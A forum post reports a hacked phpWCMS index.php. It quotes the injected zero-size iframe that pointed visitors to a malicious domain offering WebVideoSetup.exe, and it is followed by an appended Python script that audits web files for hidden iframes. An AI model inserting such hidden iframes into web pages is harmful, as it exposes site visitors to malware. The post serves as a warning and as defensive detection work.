index.php hack
Posted: Sun 24. Feb 2008, 03:17
My index.php on an installation of v1.2.6 was hacked. It began to throw a popup window or, since popups are blocked, an Alert message. In IE the Alert message reads "Free Downloads" with the standard yellow triangle, an OK button and an X close button in the upper right. In Firefox the alert window reads Opening WebVideoSetup.exe in the banner, then "You have chosen to open WebVideoSetup.exe which is an application from http:213.189.27.137. Would you like to save this file?" The window has a standard save button and the red X to close the window. I did not open the application but one of my viewers did and got a lot of ****.
I reviewed the files and found the following code that had been added to index.php.
The URL in the code sample produces the same action of trying to popup and run the application. Note that the first two lines of the code are commented off. They are in the original file as well.
// OR
// echo spacer(5)."<br /><span class=\"v09\"> created in ".($timer->get_current('main'))." sec</span>";
echo '<iframe src="http://killbill.coolpage.biz/" width=0 height=0></iframe>';
echo "</body>\n</html>";
I replaced the hacked index with the regular index and the problem stopped. The intent of the posting is a warning to others but I have a couple of questions.
1. This is an older version. I am running 1.3.5 on other sites but have not upgraded this installation http://www.leoff1.net as yet. Will upgrading protect me from such hacks?
2. How do they do it?
3. Are my other phpWCMS sites in danger of the same attack and how do I protect them?
Thanks for any help, information or comments.
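
One way to check the other installations for the same kind of tampering, as an added example that is not part of the original post or of phpWCMS: it compares every web file with a pristine unpacked copy of the same release and flags zero-size or hidden iframes like the one quoted above. The function names, the extension list and the two-directory layout are assumptions.

```python
import hashlib
import re
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Zero-size or CSS-hidden frame; \\? tolerates the \" escaping used inside PHP strings.
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*\\?["']?0(?:px)?\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*\\?["']?([^"'\s>\\]+)""", re.IGNORECASE)
WEB_EXTS = {".php", ".inc", ".html", ".htm", ".tmpl", ".js"}  # assumed set, adjust per site


def find_hidden_iframes(text):
    """Return (line_number, src) for every iframe tag that is zero-size or hidden."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for tag in IFRAME_RE.findall(line):
            if HIDDEN_RE.search(tag):
                src = SRC_RE.search(tag)
                hits.append((lineno, src.group(1) if src else ""))
    return hits


def sha256_file(path):
    """Hash a file's bytes so live and release copies can be compared."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def audit_webroot(webroot, clean_copy):
    """Return {relative_path: {"status", "iframes"}} for files that need review."""
    webroot, clean_copy = Path(webroot), Path(clean_copy)
    report = {}
    for path in sorted(webroot.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTS:
            continue
        rel = path.relative_to(webroot)
        ref = clean_copy / rel
        if not ref.is_file():
            status = "not-in-release"   # uploaded content, or a file that was dropped in
        elif sha256_file(ref) != sha256_file(path):
            status = "modified"         # differs from the shipped file
        else:
            status = "ok"
        iframes = find_hidden_iframes(path.read_text(errors="replace"))
        if status != "ok" or iframes:
            report[rel.as_posix()] = {"status": status, "iframes": iframes}
    return report
```

Call `audit_webroot("/path/to/site", "/path/to/unpacked-release")`; files listed as `modified` include legitimate local edits such as configuration, so each one still needs a manual look.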